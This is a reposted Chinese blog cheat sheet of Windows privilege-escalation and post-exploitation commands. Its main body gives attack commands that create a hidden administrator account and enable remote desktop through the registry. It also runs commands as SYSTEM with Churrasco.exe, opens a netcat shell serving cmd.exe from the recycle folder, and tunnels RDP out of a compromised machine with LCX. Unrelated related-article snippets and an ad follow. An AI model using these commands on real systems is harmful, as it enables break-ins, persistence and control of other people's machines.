cmd提权的一些常用命令

摘要:
0x00提示今天,我在Windows下学习了一些维权知识。我会和你分享。稍后查看它们也很方便。Daniel还可以帮助我使用0x01cmd的基本命令(这是安全工程师的必备命令。如果你不知道,百度谷歌值得拥有)。Netstartelnet打开telnet服务(打开servicestartXX)。Netuser检查所有用户列表。netuserhack123hack123/add将用户hack123密码添加为hack

0x00    小菜今天学习了一些windows下的提权,分享一下,以后也方便查看,也请大牛指教

0x01  cmd基本命令(这乃安全工程师必备,如果你不知道,百度google你值得拥有)

net start telnet           开telnet服务(开启服务 service  start XX)

net user            查看所有用户列表

net user hack123 hack123 /add           添加用户hack123密码为hack123

net localgroup administrators hack123 /add   将帐号hack123升级为管理员

开3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

0x02  巴西烤肉  简单介绍一下,主要是服务器支持wscript组建,如果不支持就考虑别的方法吧,毕竟那啥,姿势还是要对,不对换一种呗,说一下利用,先上传一个cmd,然后上传巴西烤肉

执行 XXXXXX Churrasco.exe "net user hack123 hack123 /add && net localgroup administrators hack123 /add"  (XXX是路径)

XXXXXX Churrasco.exe "net user admin$ /del"  删除帐号

query user  查看会话

logoff ID号  踢掉

XXXXXX Churrasco.exe "logoff 1" 

0x03  NC反弹

路径 c.exe -l -p 端口 -t -e 路径cmd.exe

XXXXXX c.exe -l -p 1234 -t -e c:RECYCLERcmd.exe

NC上传

DOS界面下运行:

NC -vv url 80<1.txt

-vv: 回显


80: web端口

1.txt: 就是你要发送的数据包

0x04  LCX端口转发

先本地监听X端口 lcx.exe -listen X 3389

c: ecyclerlcx.exe -slave 自己的ip X 肉鸡IP 3389    LCX转发

c: ecyclerlcx.exe -slave 202.134.12.12 X 123.123.4.4 3389

免责声明:文章转载自《cmd提权的一些常用命令》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇浅谈webpack4.0 性能优化Notepad++提升工作效率小技巧下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

C#连接SQLServer数据库

usingSystem; usingSystem.Collections.Generic; usingSystem.Linq; usingSystem.Text; usingSystem.Threading.Tasks; usingSystem.Data; usingSystem.Data.Sql; usingSystem.Data.SqlClient;...

CMD命令

最近接触了一些CMD命令相关的东西 ----------------------------------------------------------------------首先是一个不停拷贝文件的小东西 #include<windows.h>int main(){ system("mkdir new"); system("mkdir tem...

Android的一些常用命令提示符(cmd)指令[转]

1、在命令行管理模拟器设备(AVD) list:列出机器上所有已经安装的Android版本和AVD设备 list avd:列出机器上所有已经安装的AVD设备; list target:列出机器上所有已经安装的Android版本 create avd:创建一个AVD设备 delete avd:删除一个AVD设备 update avd:升级一个AVD设备使其...

教你用CMD命令查询域名的DNS解析记录:A,NS,MX,CNAME,TXT

cmd就不多介绍了,开始->运行->输入cmd回车,打开cmd,在这里可以随时查询域名的DNS记录,比如A、NS、MX、CNAME、TXT记录。 A记录是解析的ip地址; NS记录是指定由哪个DNS服务器来进行解析,一般不要修改,在必要的时候,比如godaddy的域名服务器被国内屏蔽,那么我们可以把域名寄存到dnspod免费的域名解析服务器来进...

WindowsServer2012 IIS8 500.19错误 ExtensionlessUrlHandler-Integrated-4.0

解决办法: 打开CMD或者PowerShell(就是左下角那个蓝色的) ,执行以下命令: dism /online /enable-feature /featurename:IIS-ISAPIFilterdism /online /enable-feature /featurename:IIS-ISAPIExtensionsdism /online /en...

[转]DbHelper通用数据库访问帮助类

之前我一直都是在博客园中查看各位高手的博文,确实学到了不少知识,不过比较少写博客,现在就把我自己在项目实施过程中使用到比较好的技术框架写出来,希望能让更多的人了解和学习。      通常我们在开发使用数据库访问帮助类时,都单独的针对某一种数据进行编写相应的数据访问帮助类,如SQLHelper,OracleHelper,OleDbHelper等,其实这些都帮...